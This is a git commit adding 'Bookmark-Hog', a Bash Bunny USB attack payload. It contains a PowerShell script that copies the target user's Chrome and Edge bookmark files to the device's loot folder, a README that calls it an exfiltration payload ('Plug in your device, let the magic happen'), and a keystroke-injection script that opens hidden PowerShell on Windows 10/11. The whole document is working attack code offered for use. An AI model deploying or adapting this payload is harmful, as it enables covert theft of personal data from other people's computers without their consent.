New payload - Bookmark-Hog (#543)
parent
b10a644277
commit
8e322706bc
|
@ -0,0 +1,47 @@
|
|||
#Bookmark-Hog
|
||||
|
||||
# Get Drive Letter
|
||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
|
||||
|
||||
# Test if directory exists if not create directory in loot folder to store file
|
||||
$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
|
||||
$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
|
||||
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
mkdir $TARGETDIR
|
||||
}
|
||||
|
||||
# See if file is a thing
|
||||
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
|
||||
|
||||
#If the file does not exist, write to host.
|
||||
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
|
||||
try {
|
||||
Write-Host "The chrome bookmark file has not been found. "
|
||||
}
|
||||
catch {
|
||||
throw $_.Exception.Message
|
||||
}
|
||||
}
|
||||
# Copy Chrome Bookmarks to Bash Bunny
|
||||
else {
|
||||
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR"
|
||||
}
|
||||
|
||||
|
||||
# See if file is a thing
|
||||
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
|
||||
|
||||
#If the file does not exist, write to host.
|
||||
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
|
||||
try {
|
||||
Write-Host "The edge bookmark file has not been found. "
|
||||
}
|
||||
catch {
|
||||
throw $_.Exception.Message
|
||||
}
|
||||
}
|
||||
# Copy Chrome Bookmarks to Bash Bunny
|
||||
else {
|
||||
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
|
||||
}
|
|
@ -0,0 +1,104 @@
|
|||
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
|
||||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈¢er=true&size=30">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Bookmark-Hog
|
||||
|
||||
A payload to exfiltrate bookmarks of the 2 most popular browsers
|
||||
|
||||
## Description
|
||||
|
||||
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
|
||||
These files will be saved to the bash bunny in the loot directory
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Let the magic happen
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
atomiczsec
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<h2 align="center">📱 My Socials 📱</h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
|
||||
</a>
|
||||
<br>YouTube
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://twitter.com/atomiczsec">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
|
||||
</a>
|
||||
<br>Twitter
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://discord.gg/MYYER2ZcJF">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
|
||||
</a>
|
||||
<br>I-Am-Jakoby's Discord
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,22 @@
|
|||
# Title: Bookmark-Hog
|
||||
# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.
|
||||
# Author: atomiczsec
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
|
||||
QUACK ENTER
|
Loading…
Reference in New Issue